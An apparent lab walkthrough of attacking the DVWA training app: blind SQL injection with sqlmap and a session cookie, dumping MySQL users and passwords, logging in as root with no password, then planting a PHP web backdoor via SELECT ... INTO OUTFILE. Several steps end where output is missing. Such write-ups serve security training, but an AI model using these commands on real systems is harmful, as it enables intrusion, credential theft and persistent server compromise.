1. We open the DVWA blind SQL injection page; the link is:
http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/
2. Next we identify the parameter the page takes, since that is the variable sqlmap will inject into. The first sqlmap run is:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --dbs
This does not succeed: DVWA requires a logged-in session, and without the PHPSESSID cookie every request is redirected to the login page. The security cookie also selects which version of the vulnerable page is served, so we pass both cookies and try again:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --dbs
Now sqlmap enumerates the list of databases:
3. We try to get an operating-system shell with --os-shell:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --os-shell
This does not succeed either. On MySQL, --os-shell works by writing a stager into the web root with INTO OUTFILE, so it needs the FILE privilege and a writable, web-served directory that sqlmap can locate; when either is missing it fails. So we try another way and go after the database itself.
4. Then we change the sqlmap options to enumerate the database users and their password hashes:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --users --passwords
This time we get what we need. The MySQL user is root and its password is NULL, that is, no password is set at all.
5. Now we connect to the database directly through the mysql client (press Enter at the password prompt, since root has no password):
root@elha:/ubuntu# mysql -h 192.168.56.101 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.1.33 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
And then we list the databases:
6. Because we worked against dvwa in the earlier steps, we use the dvwa database to create another table, or to insert another record into one of its existing tables, holding the PHP code we want to land on disk.
Now we have that record:
7. Then we dump that record to a file in the web root with SELECT ... INTO OUTFILE, which gives us a PHP file that executes whenever it is requested.
8. Finally, we test the backdoor and use it to upload whatever else we need.